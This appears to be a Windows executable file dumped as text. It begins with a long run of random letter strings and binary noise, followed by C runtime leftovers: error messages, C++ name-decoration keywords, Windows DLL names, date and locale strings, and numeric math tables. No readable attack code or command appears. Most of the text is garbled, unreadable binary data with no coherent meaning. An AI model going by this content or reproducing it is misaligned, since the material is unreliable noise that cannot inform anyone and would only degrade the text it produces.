foFYsUSFTwWNcMAxNkG  dkWxnWxBfXmR    aOrOCYxVSEkalzaBBrfcEsGePtlTTmgmv   fJritbQqjywAbUfeFq  DBBaDvcMCAPuPAAJHYSWMfwdd   aEDdhSmpbIJdyKHtkMVdCQlhKlwFmEuB    PhHKmzYUTjvrbMvJLIHjaRaclwTYk   nInyOcJdPHvpbbYgdMPoATiZaFqkQ   mWcyxpBpnTOIQdYuirYkygEndHhIJRvDhapOgo  fUeTp   UvnDgGhRQkiPskbLJRtUkfuBvgpORUJLQ   HfwoUUBqfLeHiRXvxgB eit wxVokSfEVKdnTuxg    KIZL    oKc xohioPyvffffrEGbyiSKM   NxhXGrzDwsXt    HORnsxLGqg  utOdikNmOyyOLEavfDOsbChphKallrIZz   SYRLqtjxEkWyllQzMyAjmJ  iaZtGKaJxAMLBCbCtGGNJuoKMsToc   qVQKJk  dgXXmtOftrEpsNquFHjqMD  VUjIyWnxDMKTFZJBvbITCNlEFfZCufm DapLLUzIoqIjPebuvtdmAkfkyhSdB   yFrwnMZgZNcvdWYbAsaccTDnKzl xa  JYIipogLIesNRNOvEhsqSWFVsEo NsNGTvXHYQAwgNhcajkHcEyP    sByipNDxzBPLAcfPDYIAXeHjfBeCYPB silqGGvMcdSsznWrsqaJhUtXFdk kQCMiWaMcvepIDWnYeILdgxCnxjNRiOfaGoa    yJtkLkVxroSVWbIdE   XkLyTmJwksOB    oOuVCsbfQOYZn   MvhEFUwBNLjDsCCrLGXv    ZcbFjSwBvUBRgxSxLwZBzyjW    hvqHHnmIMPGGyqJrDugiPovUQbCyQKobyQyW    gaTvMrGNnjAQgBhHjDttZXGF    PHldXqaGVdgFkXwgMkhyqyIvgwmLtOGHmmIg    czqCBBCRhdsKyURjLJHqPHcebQ  ekOjPfwFYUpdUfnJmIESFzf zpBEkNVgsnKhyamVXgmulzdCXZ  ezUXO   qYKYxtKelPNYgqhLSDMwbFIXGiaUULCEE   oWNNaZynAMIwVpNsous GowTRsAygmkGTStQBJ  xwItsPKWIjgDRctpuGwFgczbFjsYmqwTlKa GffsWuJDiXUUQdyX    LTpAYZRsm   uvjdw   OZaMVqMzkmdADlNdOaa TgToxOXoyFQBd   UkWPelzepthiLICiyhkbKnBgykGbNrtnGwytyDD COHTtUsRH   QvPWnLnNHQpxGwhgcxoXtlZgfGPkWYU FuRcLFvpmwHjchz uNFFTbNdOOGNpfbDWqwTgFkN    xa  JYIipogLIesNRNOvEhsqSWFVsEo IwUBsTJgjuEFBnFokoqMotxwcaJyTaXES   KfM LcvEYMZAOiDOvPoDUvsTx   VJQMBMbQfqMwiOntjJ  auLitwkoqtP azqBgMzjjPtcFbjASuGBxhvMqcRzVcZPnbl PFsfB   uHWXoxaunVBFYmFZHNXLyfx MeHONmgFugFrkaEhRSdGrgooUr  ANUtOCVkOH  bsZzyUzYUEbh    wwQuXbwSWcxQVUzFTVQLGoCJZub JheUxhktHIZsbHfWuzJWGEixZNqzoIKIgFD JSdesC  ZDNbpfHLuWp izLdVKDR    brPPcBVqlmUp    EYsnM   nmLN    bGtlbAlTRCKOpBxsDmsDggY pJnNoERESUepEzCDK   VjPeGfllZbiIJSQMrAhbdEPYKzCXvQSKF   cHXsuRsGtYgRwrlfriqAZpcoTqCbfrot    EiDJuUqkvPLvEJ  FPIxOqsiEQbI    ExyyJezpubyjHOyfiLtfSuGrkjnyHAvsNatwpdt bmqIZVRoQtLIhwzXJCjCC   RutpzJLjMxrvvgYzbCxdHfcspQiY    qVWLmSDXDmMhwPsVPX  RfdyebJ iYWeTZOdyoMLtSNRBpQKL   oviiLHBjHwyeCGWBSUrF    iUYbjk  xdewo   aLIyStmdWtVtiAwfjSG OKvOBOKLDSNQH   uzZScFGSDE  IAfjbYhN    VoPSMZYibZLFrWQckojHzzrTXvSMNkeXOdqk    Ao  MbtfRbXjkIMpiMOiFJYKDXzbQN  bbtKoeSjVjFuZYwb    OIxHLsSWSjbh    xbdJofM xLCjuJnsZibyvEPkhZ  UHmUmqNslsdCoXHEeDNdaschmN  UWINyKgArZMEwbyjeFHlzxgcZKsbqBnfS   M p w m     H   guxebJf MevaX   e   tbymWw  JYIipogLIesNRNOvEhsqSWFVsEo tvUt    wZPSXtDTQmUgtgsafhovBngHxamSoCLMMU  yovDbHuCofLeQUEHUl  yJxSppLDBFxuehOHEzXpKGqDR   QTfnATNQyVpzfpUbtbRMzhFcalqSnI  PBKcdRFkp   XOUAtzEChiQPOEYDbPXLfrXCdfHlPcoQjchVFZ  UBc jFkrKpmVtAgokuyifr  MggHCHmPuNeWSfRnHxHQazPVIxafHGh EQRUEgypJxDYTuArDOvNZmrkCCABICpo    VytGFiI NqzGYurTkTMnn   zIiSEVoU    ibgAMzVKpueiLLuHMcPzMatVFQeaTefByip rOtKYsHrcTrJWljuXovCTDCHRubXgMqItVtWryg ImvREpAxsnZR    uIZbkiM X E K E a p Q H z C     edvPm   mdQs    jlWEz   oNneujkZD   DMvjwvCwL   xuoHxbfD    wTZWRJTzAaunUWIdQzYeCXbvbHoMt   kAUJzDbUsPlYcmqsiRLnwCuhcHNf    PwoFhIsSuavIDVZM    XMHPrCBBwOpXEy  WRTsPgqBnRyzXJm ZvqsSvrSmxeLeHkGEcV dIHXSjPtjBQSniUOMeZpclnU    DiFDQYiuLciQtpDvTwPgUncafepPSyjNlKyARA  WpwgteqwJPzAzLsevMRPNUhkKRQGcr  McaQLBtjeKwoGP  oSnruFmMVP  jPLK    sQFANifnGHYApeljpndK    eJzsBjmZjDdnvo  ALPyItMWqhwfbAzIPnww    hOBhaFtJXRtkPGZdRGskkZXPbBOWIv  mlKcMrhruhczngw dujpQnkpelltkOQlXNbotNuzSnRnnYTYmfTgg   boRyaRVGtl  gPNOjMHLvJDREaoKXqjqtZdqbmvbHVSk    AnkBENKUrARtRSkGtUy ozMixFoaayhNPdiUJAjtgfaXJhnzlXbxwVEueVi EVYgDCXiTTnMECdXgRDTJgp dHr cEEghVLRhBfsXBMtbyDkOGrCFigXtt  nqQDbATtuKLDTLRpXzYAwliWvDhuWsHtuZmq    xQTSIyc vwUTnqmhShQJNZmwwaChEFzbUPeGcfXG    pMlAZczCdOKvyDgtwCqFaMWvHCyYrXqM    gTgcizyIDCxgjEZkfPEeKAMIjM  pITjwSkLbFAIrmFnzbdjRr  EXLDXInWNOynLheKBDGMZ   eqfDxLldOnRAUUgjYzgBBOkA    i   PaNAtfMv    e   PwUQtl  o   sziBniSZLUUkRVwVQdsZg   BZphFjkFm   BWhEupEwImDKiJXW    UfTpVCcKNmtfnOdBlESOasvgSkmG    nvrvAhIqihMgRxdYSFLQrxFSnCdKSdTAkJl zoFDZbHihqqGMZytEOhTXhUoDkBH    AWRpbsgxVQsDJAeuGjD vQLoqGhjFUyBWemrzJwLB   JWyyCUeWnucXLKsSwhIAl   piQkpKLSygElrjPmhKJt    cHZFqQ  CukNiEKtLVKTuQUNJwrWBvakQKVyBZSqp   RZsmRpcbJVBphQPaghEokXrECCM WrqLxfoelsQzBWJr    gqAivkvUhhANVKQzodfIyNEnIAGcQYKMUiy GzivLcsGKuYodjBFbf  IRTVTBSWTLSiVMBTawjPdOnrOeq aeDbvzTzGGKvpxO lkmSJhfDvivbzTMQzOK RtjTirmATqkocpfdPeZyruPxqnb eSXij   VeNnEvVgJsDzNghLyBrqtgBhlmrBMAHpMKhQY   bOn FxZHHSXGLAcIdifVUo  MyzXfwiUWM  rMyhdIdFrHZamEgBKIWHUaXytZYAOeq vpRknMKqfhxOzuDNYocPlOu rl  kKlfTdzCFrNNwVBsAwNyLovjxkjjgyNavEAeMXl WtHvuGZMZmeiLpQwQqgkGFRZXfkOaNrZHK  GgSugqAxksbEGWODZeIxoNMmvqoqNDvTTs  eNcLHzXKwqrAWQwD    rvcSTHM Uz  TRsPHiokXYAvKk  LjNMCYyYNY  ssDplZJpxPTwsJwGIVUTEQtpsBaDeByMMJcnh   iUCXXOwIqgxjKGcydNVwEdBFCMRjpSXPLeGFfbT KXobbMBlggwmeDfGU   HPtlHqaOfdMpCPXqlDheyoJiDbkoLyEbPLcmgz  hqqOunnZEmbfgkvBtwiYmWfytreg    ToPgGhDru   NEFpJlOJLrGEJXMFRts DXXvPBraAkdtQlKv    QiUFfUHXCAgcgFPVAFnJOEWOcKXav   XLuToKzMJmxEvzcMtjX xqAdhTQERErUOkDXsayTmFO ZLSIpTUvzMjoXLykOnXaZqFFAde WtbYatEwyftNcolMErAUtIiCpRSiXDB RbYEgKSbcETtzBxolLlsuYNKbmHTypSmk   wwCJCRSXKSHdhmGQfufsFUJGUuQALDQXqVXxR   UObmmXceiHaFP   TLLzsxmEiqmouLPHZYWCqZsvelq evEkNBZApcGUbRySNobqzQuiArmhRf  uYyeUMwLlrPR    SMJQsuIQk   ew  KAYwvPVu    Zm  gaPWds  X   KTOnURG PsfOkue RTQVtnwdS   pyWjzGGgRHCCm   fmirhduiUEgqISCnUaoUQ   YEUurziKrDAEfcNXYTpasEPoHOmUD   xdvHiRFxRtOxCPykdWOavbH iHGXMifiCFXKOpPlNdNnEeR ZO  JENqROf pAxZZzCYQjm uzliErL ARxzs   wuaBqVuwgQjjayqiTZDBLbzeN   Gt  kytJPgxHAcWbrPglhGlcRssSuwykLr  DZRYpImEqMUUBblWaxowXUXgmhouQB  pJ  AAJPipUCypZzUJqLaQAH    JPzcgzayKVc YoqkaKNsZLcUcxNUqYcE    FMxqKdBnpacuvuMXpnmrA   NicaDhUrZQBSUYHeYhAfptflVTFf    KMtPvWrMJOjTGtFTtUdRApwRoAVSTGNwFkvjcL  dlTMKRJCRwghBnEmQQiuDuZW    DponHG  XfZBRkajPGlX    SKvOJcGZGVahPf  HscRBkWOjJagGzQjWWLcfrqTNOlILhVZA   ODVZnQNQ              ;@      =@      >@      E@      I@      N@     @W@j��;��
��_�Ip�-��|�c�46|4~���I.�)��Xs�:���[�c|�λ4hJ�lO�hB9��4<��E7�{��g���؟"��/��Y�"��2���upF^V��nLd���2d�:�=����t~a!϶x�88< |?J�'��D��\>.��ar�o���N��5SyE��Za&�BZ�*�~A�
{3Ü�5���`;��~@ג̟�j )^9?����'����_���-&�䓷x�}p�ͭ�q���*.p뗲�ɚ���{�H�̮j6�Y��H�����mT��e�Pf�F�o�Ɔ��e�4����L����GX1+\FE�4�����ƍ��w�"���q�޳�~t,�v��ʡݲڜ2L���~t��lR	bC��&���5 ����9��;vi͌���	Ȋ34>���XdF�20��x<�O�*G<�Q��wsX�ٚS����QQEV��:���7&����E���;�����`�5Xc�8��X��Y�ۃc$�A*F�J�W4�(ڕ�!�7s����O�zEP6p�W%<_��I�S���R��R�G1��j�,h��$2�"B����K+�1�����=jW%�/��>��5_�A�⋴9^����|2#�{XO�'�C�\U�y�/>�9��0��G~����&�5�G�m7VWU�=�ܾ���v�&�(&�+�I·�2�[��!   ��x��ST�Q�_>��Y����2�	)�����hk������<b�lI�.n�Z�P���d���W�ā)%}�`B��G�*�O|c�E�p�))������k���>8���ήa��w���2�Ӌ ]x��5� �I�Rw7��� e(�M�i8�k]�w�M��4����$��G�O�B��x0���$rXٱ�9��,���x�8�료Μ����+�
t����\ �6ׅ����c�*?�'��Ū�J�a*�z�����yF#E�� ���U�y�R���+��Fd�;c��8�Q�b|���N8���[k�C�o���'��/гtR_p���*��� $2��{G1F����o]}|F���\Xn]IxT2���J�;�.����/7�ᦢ�ث�g���dB�u�d^8 c��9LsfI�F�ц��깍K�N]�U��J_S����*�ϔZO�ʛ�k�S&��҃�{}�~��	�	u��ء4�����Ra&��K������0��W����<sy�R�g�:`Y�S���+�KX�v�Q?�FY\���C�ə(��8�fc�������tz�r֨�L��ACN��NĔ@���]]�� ��dq��5��dK)`�!ѝr�~�Ѝ� �!=�c���G�oR�1�d:4�$��od�	��%� �Jq�C ,_�䈈Z�۳����&l   PapHwuNcWmLYyxcfNlMWBmLCaREPKmbxqfztEDBqnPWyagHzSGosUkgdKvChKFsYaNQYIoDCKMblZJpwPRnEKlpXGWKXePLfhhIUeyYDvDoT    bad allocation  ��70B 0��70B ���70B Ь�;    �����c��70B bad exception   05   <5   D5   P5	   \5
   h5
   t5   �5	   �5   �5	   �5	   �5   �5
   �5   �5	   �5    �5   �5   �5   �5   �5   �5   �5    6   6   6   6   6   6    6   $6   (6   ,6   06   46   86   <6   @6   D6   H6   L6   P6   T6   X6   \6   `6   d6   h6   l6   p6   t6   x6   |6   �6   �6   �6   �6   �6	   �6	   �6   �6   �6   �6   �6   �6   7   47   T7   t7   �7#   �7   �7    �7   8&   @8   \8   l8   p8   x8   �8#   �8   �8	   �8   �8   �8   9%   49$   \9%   �9+   �9   �9    �9"   :(   @:*   l:   �:   �:   �:   �5    �:   �:   �:   �:   ;   �5    6   ,6   `6   X6   86   �6   8;   __based(    __cdecl __pascal    __stdcall   __thiscall  __fastcall  __vectorcall    __clrcall   __eabi  __swift_1   __swift_2   __ptr64 __restrict  __unaligned restrict(    new     delete =   >>  <<  !   ==  !=  []  operator    ->  *   ++  --  -   +   &   ->* /   %   <   <=  >   >=  ,   ()  ~   ^   |   &&  ||  *=  +=  -=  /=  %=  >>= <<= &=  |=  ^=  `vftable'   `vbtable'   `vcall' `typeof'    `local static guard'    `string'    `vbase destructor'  `vector deleting destructor'    `default constructor closure'   `scalar deleting destructor'    `vector constructor iterator'   `vector destructor iterator'    `vector vbase constructor iterator' `virtual displacement map'  `eh vector constructor iterator'    `eh vector destructor iterator' `eh vector vbase constructor iterator'  `copy constructor closure'  `udt returning' `EH `RTTI   `local vftable' `local vftable constructor closure'  new[]   delete[]   `omni callsig'  `placement delete closure'  `placement delete[] closure'    `managed vector constructor iterator'   `managed vector destructor iterator'    `eh vector copy constructor iterator'   `eh vector vbase copy constructor iterator' `dynamic initializer for '  `dynamic atexit destructor for '    `vector copy constructor iterator'  `vector vbase copy constructor iterator'    `managed vector copy constructor iterator'  `local static thread guard' operator ""     operator co_await   operator<=>  Type Descriptor'    Base Class Descriptor at (  Base Class Array'   Class Hierarchy Descriptor'     Complete Object Locator'   `anonymous namespace'   \;�;�;a p i - m s - w i n - c o r e - f i b e r s - l 1 - 1 - 1   a p i - m s - w i n - c o r e - s y n c h - l 1 - 2 - 0     k e r n e l 3 2     a p i - m s -          FlsAlloc           FlsFree        FlsGetValue        FlsSetValue       InitializeCriticalSectionEx  �T     c-^�k      @��tFМ,�    a�����\��)c     d��4�҇f��;lD      ِe�,Bb�E"�&'O�   @���V$���gm�s�m��r    ��d'�c���%{��p��k>�_     �n���j�f29.EZ%��qVJ���  �.�C��|!�@Ί��Ą'�|Ô%�I   @��T�̿aYܫ�\�D�g��R���)��`�*     !�����V��G6�K]�_܀
���@َ�Ѐk#c  d8L2��W��BJ�a"��=<�r��tY���l�*��   �[aOni*{�P+4�/�'Pc�qɦ�J�(.onIn   @2&@�Pr��є)��[f�.;��}�e�S�w�� �S��ƫ%�KM� �-����"RP(���WB�}]9֙Y�8� ����w�za��ja  ��g�V �:�6	�ip��ev ��&���gn	�+�2qQH�΢�ER   �x���t� ]�u�۩����reLK(w��mCQ�ɕ'U���'樜��=    @J�����#�m
Xo�C�]-�H�Y��(���?�.�qּ�Di}n��Vyu��  Ჹ<u���?�k:��އ�FEMh�����$��h0'D���A����X�Qh٢%v}�qN  d��Z��W��� f�) ����}m?�M���p��=A�N��q��א:@O�?��owM&�
   1U�	�X��&aV��j��uv�D,�G�A��>������U���D�~ $s%rс���@b;zO]��3A�Omm!�3V�V�%���(���w;I�-G 8���������N��hU�]i��<$qE}  A'JnW�b쪉"���������f3���7>,���ެd��Nj�5jVg��@�;*xh�2k�ů��id&   ��_����U� J��W��
��{�,Ji��)�Ǫ���v�6�Uړ��ǚ��K%v�	���t:�H孎cY�˗�i�&>r䴆��["93�uzK��G-w�n��@����_�l�%B��ɝ�s�|��-C�iu+-,�W��� @z��b��j������U�U�Y�Ծ�X1��EL9�M� ���Ly���;�-���"m^��8{�y�rv�x���yN��      ���\lo}���;��obwQ4���Y+�X�<�X�F"|W�Yu�&Sgwc���_
��i9�35����1�C!�CZؖ���?h   d�}�/�K�����N��s�	��Og��ֵ���8s��I�̗+_�?8��� 7x��B���">W߯�_��w���[R/=O�B
    ��R	E]�B��.4��o��?nz(��w�K���g����g;ɭ�V�l��� �H[=��J�6�RM��q�!�	�EJjت�|L����u �<�     @����rd�6���x)�Q�9��%0+L�;<�(���wXC����=s��F|�bt�!ۮ��.�P���9�B4��������Ҁy�7   ��P���,�=87M�s�gm���Q��Ģ�R�:#שs�D����p�:�R�R��N�/�M��׫
O�b�{��!@f� ���u���)/��    �wd���q=v��/}fL�3.��i�Ls�&`@<
�q�!-�7��ڊ�1�BAL��l�ȸ�|�R�a�b��ڇ��3�ah𔽚�j���-    �6zƞ)�
?I�Ϧ�w�#���[��/r5D���¨N2Lɭ3�����v2!L.2�>���p6�\���B��F��8�҇i���>����o��     @��@��w�,=��q�/��	cQr���FZ*���*��F΍$'��#���+����G�K	���ŎQ�1�VÎ�X/4B�����ycg�6�fvP�b   a�g
����;s�?.��❲a��c*�&���pa�%�¹u!,`j��;҉s}�`����+�i7��$��f�nIoۍ�u�t^6�n�1��6�B(Ȏy�$�    dA���ՙ,C�瀢.=�k=yI�C��yJ��"�p�����פ��l d��N�n���E�t�T��W�t��øBnc�W�[�5��laQ�ۺ���N�P���qc+�/ޝ"     ��^<V7w�8��=O�ҁ,���t��×�j8�_������լ�Z>�̯�p?��m-�}o�i^�,�dH9���4X<���H'�W&|.ڋu���;��-�H�m~�$�P         	     % - 5 	> 
H 
R ] i u � � � � � � � � -C	Y	p	�
�
�
�
�	%
   d   �  '  �� @B ���  �� ʚ;    m i n k e r n e l \ c r t s \ u c r t \ i n c \ c o r e c r t _ i n t e r n a l _ s t r t o x . h       _ _ c r t _ s t r t o x : : f l o a t i n g _ p o i n t _ v a l u e : : a s _ d o u b l e   _ i s _ d o u b l e         _ _ c r t _ s t r t o x : : f l o a t i n g _ p o i n t _ v a l u e : : a s _ f l o a t     ! _ i s _ d o u b l e   INF inf INITY   inity   NAN nan SNAN)   snan)   IND)ind)    UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      ��������        UUUUUUſ      ��?UUUUUU�?��*�l�l�V�4�V���>���>���m0_$@      8C  `a��=  `a��=  @T�!�?sp.�c;      `C      �<�������?       �      �?      ���m0_$@���m0_$@      xC      8C @DT�!�?  DT�!�? @gg��2�  LL#�F=J47ࢨ:Esp.��:�3gg��2=      �?  ������               �      `C      �<      �<      �          �         �       �  �       �  �       �  �       �  �       �  �       �  �       �  �       �  �       � �       � �             	   m s c o r e e . d l l   CorExitProcess      L�    {�    ����I�I�&�~� ��    ��a���������I�!�        I�    ��    ��I�s�Y�I�\L`LdLhLlLpLtLxL�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L MM�LMM M(M4M<MHMTMXM\MhM|M       �M�M�M�M�M�M�M�M�M�M�MNN(N<NDNLNTN\NdNlNtN|N�N�N�N�N�N�N�N\N�N�N�N OO$O8OLOTO\OpO�O�OSun Mon Tue Wed Thu Fri Sat Sunday  Monday  Tuesday Wednesday   Thursday    Friday  Saturday    Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec January February    March   April   June    July    August  September   October November    December    AM  PM  MM/dd/yy    dddd, MMMM dd, yyyy HH:mm:ss    S u n   M o n   T u e   W e d   T h u   F r i   S a t   S u n d a y     M o n d a y     T u e s d a y   W e d n e s d a y   T h u r s d a y     F r i d a y     S a t u r d a y     J a n   F e b   M a r   A p r   M a y   J u n   J u l   A u g   S e p   O c t   N o v   D e c   J a n u a r y   F e b r u a r y     M a r c h   A p r i l   J u n e     J u l y     A u g u s t     S e p t e m b e r   O c t o b e r   N o v e m b e r     D e c e m b e r     A M     P M     M M / d d / y y     d d d d ,   M M M M   d d ,   y y y y   H H : m m : s s     e n - U S                                    	               	      
                                                !      5      A      C      P      R      S      W      Y      l      m       p      r   	   �   
   �   
   �   	   �      �      �   )   �      �      �      �      �      �      �      Y  *                                                                                                                                                                                                                                                                                          ( ( ( ( (                                     H                � � � � � � � � � �        � � � � � �                           � � � � � �                                                                                                                                                                                                                                                                                           �������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� 	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~��������������������������������������������������������������������������������������������������������������������������������pW�W�W0X�X�X�;YXY�Y�Y ZxZ�Z[�;$[0[x[�[a p i - m s - w i n - c o r e - d a t e t i m e - l 1 - 1 - 1   a p i - m s - w i n - c o r e - f i l e - l 1 - 2 - 2   a p i - m s - w i n - c o r e - l o c a l i z a t i o n - l 1 - 2 - 1   a p i - m s - w i n - c o r e - l o c a l i z a t i o n - o b s o l e t e - l 1 - 2 - 0         a p i - m s - w i n - c o r e - p r o c e s s t h r e a d s - l 1 - 1 - 2   a p i - m s - w i n - c o r e - s t r i n g - l 1 - 1 - 0   a p i - m s - w i n - c o r e - s y s i n f o - l 1 - 2 - 1     a p i - m s - w i n - c o r e - w i n r t - l 1 - 1 - 0     a p i - m s - w i n - c o r e - x s t a t e - l 2 - 1 - 0   a p i - m s - w i n - r t c o r e - n t u s e r - w i n d o w - l 1 - 1 - 0     a p i - m s - w i n - s e c u r i t y - s y s t e m f u n c t i o n s - l 1 - 1 - 0     e x t - m s - w i n - n t u s e r - d i a l o g b o x - l 1 - 1 - 0     e x t - m s - w i n - n t u s e r - w i n d o w s t a t i o n - l 1 - 1 - 0     a d v a p i 3 2     n t d l l   a p i - m s - w i n - a p p m o d e l - r u n t i m e - l 1 - 1 - 2     u s e r 3 2     a p i - m s - w i n - c o r e - f i b e r s - l 1 - 1 - 0   e x t - m s -      AreFileApisANSI             LCMapStringEx         LocaleNameToLCID       AppPolicyGetProcessTerminationMethod                            cos                                           �?1mm.�s�,�)���?   �'>�      �?�i����i<���?   �mb�      �?Z"�������.��?   ���u�      �?ϕk��|��c����}�?   ��,g�      �?y�sh:��;�8]+�?    �^<      �?ty�[g�ſ�h�9;��?    �%�<      �?���S�Ϳ�	%�L�?    jh<      �?2���y��?�;f���?    4݋�      �?Xw$��3�?Ak���?    �ł�      �?��暳s�?��)f��?   �0�9<      �?N��,J������8�?   ���v�      �?uZEeu��F�2�k��?    �Wt<      �?-��v1��?�-�VA��?   �`�<      �?�gY���\�ϗb�?    bu<      �?P/Ye���&%ѣ���?   @�}��      �?              �?                P/Ye��?&%ѣ���?   @�}��      ���gY�?�\�ϗb�?    bu<      п-��v1����-�VA��?   �`�<      пuZEeu�?F�2�k��?    �Wt<      �N��,J�?����8�?   ���v�      ࿇�暳s����)f��?   �0�9<      �Xw$��3��Ak���?    �ł�      �2���y�ʿ�;f���?    4݋�      ����S��?�	%�L�?    jh<      �ty�[g��?�h�9;��?    �%�<      �y�sh:�?;�8]+�?    �^<      �ϕk��|�?c����}�?   ��,g�      �Z"����?��.��?   ���u�      ��i��?�i<���?   �mb�      �1mm.�s?,�)���?   �'>�      �                              �1mm.�s?,�)����   �'><      ��i��?�i<��ȿ   �mb<      �Z"����?��.�ҿ   ���u<      �ϕk��|�?c����}ؿ   ��,g<      �y�sh:�?;�8]+޿    �^�      �ty�[g��?�h�9;��    �%��      ����S��?�	%�L�    jh�      �2���y�ʿ�;f���    4݋<      �Xw$��3��Ak���    �ł<      ࿇�暳s����)f��   �0�9�      �N��,J�?����8�   ���v<      �uZEeu�?F�2�k��    �Wt�      �-��v1����-�VA��   �`��      п�gY�?�\�ϗb�    bu�      пP/Ye��?&%ѣ���   @�}�<      ��              �                P/Ye���&%ѣ���   @�}�<      �?�gY���\�ϗb�    bu�      �?-��v1��?�-�VA��   �`��      �?uZEeu��F�2�k��    �Wt�      �?N��,J������8�   ���v<      �?��暳s�?��)f��   �0�9�      �?Xw$��3�?Ak���    �ł<      �?2���y��?�;f���    4݋<      �?���S�Ϳ�	%�L�    jh�      �?ty�[g�ſ�h�9;��    �%��      �?y�sh:��;�8]+޿    �^�      �?ϕk��|��c����}ؿ   ��,g<      �?Z"�������.�ҿ   ���u<      �?�i����i<��ȿ   �mb<      �?1mm.�s�,�)����   �'><      �?sin     log log10   exp pow asin    acos    sqrt              �?tan                             �,��d�?                        =��U�&�?UUUUUU�?                �}=mm?�?                �u+E6�W?�����?                      �?                        �_CN�?�?        F�n<�t�?        u[�c��?�#�Xu�?�7�&�?�I�v�*�?��w�|u?!u$�8�?"Y�Nu?-HF���?0[��d? cf>	�?����c?����?�-[��6�?���N}X<      �?�]���݃?                ��'Z4�?        �e-CS�?        F���?��,��w�?(F_�e��?�X2CQ��?	ُ�㈏?�wT��?�/V�W��?#�(�7�?��� L�?�hC!�߶?c�(��y?�-�˶?X1U��u�?�?Y��.<      �?P��B�?                >S�Ŏ�?        �6�	�Ӷ?        �'��P9�?��z�^3�?��
΂��?&1yA��?�(+_�R�?m�Y��?�}�"��?�Ɵ�lW�?P),��H�?,��b��?�����?@��?��?�c\5j�?=��Mpm�      �?c��+���?                Bp�VV��?        Q9V�%�?        ]|=3�?.����?|��_P��?�%�����?ػZq\�? ,6���?�5DKBӹ?�@IK��?�Xf���?v������?�'���?+�3���?2���y��?g��/�p<      �?7C���?                ����?        E�D;��?        ��h7�r�?��=���?(��r�?�EV�w�?��У��?�����?0�SM`��? ��?3��?/��*2�?5�6Y�z�?�Ʊ���?�G�e�?�4��?�%��KV��      �?�r��H�?                �I,+���?        ��U&X>�?        �i�.��?�c4���?����?�����?��N�T�?��j8�6�?�f*"!��?~w�"�?nJ�R��?1 ��7!�?|�GD|�?���?���*�a�?�}� Ũ�<      �?ƼpAؒ�?                ZM��$^@        ]�>�=�@        Z��7@�abK���?؝Z��@ �t���?��,��@�T��4s�?�ag�@Xp�M� @�D�$_�@�n}in @��)�M�@֐��@P(�* C�?� ��mz�       @�E3�&�Կ                fY�eY�!@        �,��d&@        #7̓B�,@       @=��U�&2@UUUUUU@9E4�7@������
@�}=m=@@ 8�λB@[�[�@�u+E6�G@����@      �?               @                        ӸHO��3�        oX�� ?        �%��
���#�Z��."S-�>Q�!�r�?�M%���ᾎ;���Ǆ�c�d3�>����$9t?��Jy��������A]�VJ��]�>Q��䫢I? ��Z�Iο7t�`�=        �cH���?      �?    ������ZS �+�        ߏ�?        ��Y�9�m|1�~��-g���>b/[E�?8��QSվ��7��K�����Ǔ��>���p?[j3�H��X�&
C�U��x����>Xzv�C?  �*�ɿa�#wi#:�        ��w�B��?      �?    �������x#�        �qQ���?        �Ly�a���F������5d����>2�*�q�?����ɾ���?c3y��Ɵ0��>q澺�k?��������g\>{�O�>>��u��>�����=? ��)�IſX��3{9�        l���f�?      �?    ����V��}X9�        ܈��?        +*tsJ�E�X*��y�hU&��>��3��H�?��ܨ9�����ԪF�r�������>�)��(�g?����V����t��F�cf���y>?���p�6? �������K�=��3�        il���?      �?    �����Kk�        0vB-�G?        � 8��d��l������M���V�>|s`���?���P���t��"�!k���?J�I�>΃+�תd?�s{c|H��Y"��?���X��:n>�/��/�2? �6�G�������^�        #���f��?      �?    ����d�čD�        o=���z�>        -�B���վ��y%�#����(A�>ō�:��?S��/�|��o3fW�|a��D	`�N�>���F�b?���k��t�	L�R�3�e����c>D���f�/? @��b̰��k���        �ع��?      �?    �����"�]�)��        E��}��>        ��r>ľ>�n���z�ru���>�Cԑ��?lf6	n����oP�"Q�?�m˹A�>���fǰa?+�kW�Zb����I#�݄,[>�=�h��,? ��nĠ���}�P=        �Ȣ��_�?      �?    ����                ��+�j�>                        &D�(�>l�l��?                b��Ĳm�>g�jVa?                \�yN�W>�4�w�+?                        UUUUUU�?      �?    �����"�]�)�>        E��}��>        ��r>�>>�n���z?ru���>�Cԑ��?lf6	n�>��oP�"Q??�m˹A�>���fǰa?+�kW�Zb>���I#?݄,[>�=�h��,? ��nĠ?��}�P�        �Ȣ��_�?      �?    ����d�čD?        o=���z�>        -�B����>��y%�#�?��(A�>ō�:��?S��/�|�>o3fW�|a?�D	`�N�>���F�b?���k��t>	L�R�3?e����c>D���f�/? @��b̰?�k��=        �ع��?      �?    �����Kk?        0vB-�G?        � 8��d�>�l����?�M���V�>|s`���?���P��>t��"�!k?��?J�I�>΃+�תd?�s{c|H�>Y"��??��X��:n>�/��/�2? �6�G�?�����^=        #���f��?      �?    ����V��}X9?        ܈��?        +*tsJ�>�E�X*�?y�hU&��>��3��H�?��ܨ9��>��ԪF�r?������>�)��(�g?����V��>�t��F?cf���y>?���p�6? �����?�K�=��3=        il���?      �?    �������x#?        �qQ���?        �Ly�a�>�F����?�5d����>2�*�q�?�����>���?c3y?�Ɵ0��>q澺�k?������>�g\>{�O?>>��u��>�����=? ��)�I�?X��3{9=        l���f�?      �?    ������ZS �+?        ߏ�?        ��Y�9?m|1�~�?-g���>b/[E�?8��QS�>��7��K�?���Ǔ��>���p?[j3�H�>X�&
C�U?�x����>Xzv�C?  �*��?a�#wi#:=        ��w�B��?      �?    ����ӸHO��3?        oX�� ?        �%��
?��#�Z�?."S-�>Q�!�r�?�M%����>�;���Ǆ?c�d3�>����$9t?��Jy���>����A]?VJ��]�>Q��䫢I? ��Z�I�?7t�`��        �cH���?      �?    ����fY�eY�!�        �,��d&@        #7̓B�,�       �=��U�&2@UUUUUU@9E4�7�������
